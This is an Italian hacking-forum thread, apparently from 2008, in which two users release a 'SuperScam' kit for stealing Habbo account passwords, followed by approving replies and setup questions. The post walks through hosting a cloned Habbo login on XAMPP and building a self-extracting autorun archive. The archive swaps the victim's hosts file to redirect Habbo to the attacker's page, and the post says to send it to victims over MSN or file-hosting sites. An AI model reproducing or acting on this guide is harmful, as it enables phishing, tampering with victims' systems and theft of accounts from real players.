Release [+Guida+FakeApp+Server+ Fake Login V25] SuperScam Web 2.0 Powered Alberto091 & Shenil35

Stato
Discussione chiusa ad ulteriori risposte.

Alberto091

Utente Master
Autore del topic
20 Marzo 2008
2.087
0
Miglior risposta
0
SuperScam Web 2.0 (Aggiornamento Scam Rilievo)

ruv7u0.jpg

Disclaimer
[avvertenza] La Guida Compresa Di Tool e Accessori, in collaborazione con Shinil35, è protetta da una licenza creative commons, Tutti i diritti Riservati © Non sei Autorizzato a modificare e/o pubblicare tutto il materiale su questo o altri Forum, se non con la dovuta autorizzazione Da Alberto091. Prego I moderatori, di non modificare la guida, perchè se è fatta così, ha un senso. Non come quell'altra vero!?? Non accetto commento OT, Flame. Io e Lo sciax2 Non ci assumiamo nessuna responsabilità dell'utilizzo che farete di questo Tool, Tutto a scopo informativo.[/avvertenza]

[CC]Alberto091[/CC]

Ciao Scammatori,
Qui a voi Alberto091 e Shinil35 Con un importantissimo aggiornamento dello Scam server. Un rivoluzione!

Premetto Che Il fake login V25 (?) non ne ricordo la fonte... Se qualcuno me lo sa adire l'aggiungo.

Bat? Exe? Da oggi Nasce La nuova Fake Application.Gli aggiornamenti risultano """Banali""" Ma la loro efficacia è assai aumentata!

Ma prima di vedere Il Killer delle Password, xD Vediamo cosa rimane, cosa va via e gli eventuali aggiornamenti.

Requisiti​

-Un Po di Usta
- Software Winrar In Italiano​

Cosa Rimane​

- Xampp (Server Apache)
- File Hosts
- Fake Login​

Cosa Ci Lascia
- Bat
- Exe
- Bat to exe converter

Novità

-Archivio Autoestraente e AutoRun (avvio) senza Riavvio del sistema
- Fake Application​


Guide+ Downloads

Ho Pensato, per evitare di far confusione, di inserire prima tutti i donwload dei tool, e poi le loro rispettive Guide.


Xampp Download
Perfavore, Entra oppure Registrati per vedere i Link!

2qdollc.jpg


Hosts Download
Perfavore, Entra oppure Registrati per vedere i Link!

s25mz6.jpg


Fake Login V25
Download​
Perfavore, Entra oppure Registrati per vedere i Link!


9r6deb.png

Fake Application Alpha 1.0 Download+ Virus Total Powered By Alberto091 &Shinil35 (Scegliete la fake app che più vi piace)

By Alberto091 Aggiornamento

Download
Perfavore, Entra oppure Registrati per vedere i Link!


357jaqu.png


By-Shinil

2qxoz04.png


Download
Perfavore, Entra oppure Registrati per vedere i Link!


Virus Total

Perfavore, Entra oppure Registrati per vedere i Link!



Guida Xampp
1) Installiamolo compreso di apache MySQL e Filezilla
2) Andiamo in C:\Xampp\htdocs e cancelliamo tutto il contenuto della cartella htdocs
3) prendiamo i files del nostro fake login e mettiamoli nella cartella htdocs
4) Entriamo nel pannello di controllo di xampp e premiamo su "Start" ad Apache, MySQL e Filezilla

Guida File Hosts

1) Apriamo Il File Hosts col Blocco Note
2) Inseriamo Il nostro IP e
Perfavore, Entra oppure Registrati per vedere i Link!

3) File---> Salva

Guida + Combo [Fake App+Hosts] #Archivio AutoEstraente AutoRun

Prima di partire con la guida, vi spiego dettagliatamente la potenzialità di questo Semplice Archivio Compresso :shock
La Vittima Dovrà Solo Effettuare Un doppio Click sull'archivio, ed et voilà! Ben Presto La password sarà Grabbata. Automaticamente Va ad AutoEstrarre il file Hosts Nella Cartella etc del system32, verrà avviata automaticamente la fake application (senza il dovuto riavvio del sistema). La fake application contiene Fake Scripts. Ad ogni tasto che si prova a premere ci dirà che non siamo connessi ad habbo. Questo porterà la vittima a riavviare il web browser affinchè il nostro file Hosts abbia Effetto. La vittima andrà su Habbo Ma automaticamente verrà indirizzata alla nostra pagina identica di habbo, inconsapevolmente, inserirà come quotidianamente fà, i suoi dati di login, ecco qua, ora basta andare in C:\Xampp\Htdocs\Log per vedere la Password!


Inizio​

Una volta preparati File Hosts, server, non ci resta che capire come Creare Questo Archivio AutoEstraente

1) Selezioniamo dal Desktop Il File Hosts e la nostra FakeApplication
2) Tasto destro --> Aggiungi Ad un Archivio --> Schermata (seguite la Procedura):
tag3dg.png

xktzpv.png

34fo282.png


Percorso Di Estrazione
C:\Documents and settings\%USERNAME%\Desktop\Habbo Sulake Scripts.exe

Esegui Dopo L'estrazione
Habbo_scripting.exe

20pwwtj.png

Premere Ok ---> premere Ok

Il file è pronto da inviare alla vittima! Tramite e Msn e/o rapidshare o qualsiasi sito di Hosting


Si Ringrazia Alberto091 e Shenil35 Per La collaborazione di questo documento, Con tutta la rispettiva vi auguriamo un buono Scam, e Ricchezza in Habbo.

Ne Approfitto per porgere i miei cordiali saluti!
Alberto & Shenil35

Fine!!!

 
Ultima modifica:
  • Like
Reactions: 5 people
Buono, anzi mi hai risparmiato qualche download che mi serviva ad altri scopi
 
veramente bravo ma pure in questa ce il problema con ip statico dinamico come in quella vecchia?
 
ma chi 6??sei una bestia e dire che mi dispiace pure x le vittime
daniell001 non era nessuno
 
Ultima modifica:
A me non mia avete neanche nominato... xD il fake program lo creato io... L'idea l'abbiamo fatta insieme...
Comunque MOD rinominate correttamente, Shenil? Shinil35 xD
 
Ultima modifica:
bravo.. + in là, mi può essere magari utile.. xora no.. ho 2 tipi di fakelogin e mi bastano e mi avanzano (di daniel e di kingfedo)..

PS: daniel mi ha parlato di un fakelogin personale ke ha creato lui ke ci ha impiegato 2 anni.. xò neanke lo usa lui.. qnd nn è inutile..
 
scs shinil pero mi puoi aiutare alberto dice: una volta preparato l host e il server qualè il server?? scsate l ignoranza
 
non c'è server. Si va be devi installare Xampp e metterci il fake login ( lo trovi nella guida in rilievo ). usa la guida in rilievo poi per il programma vieni qui!
 
Stato
Discussione chiusa ad ulteriori risposte.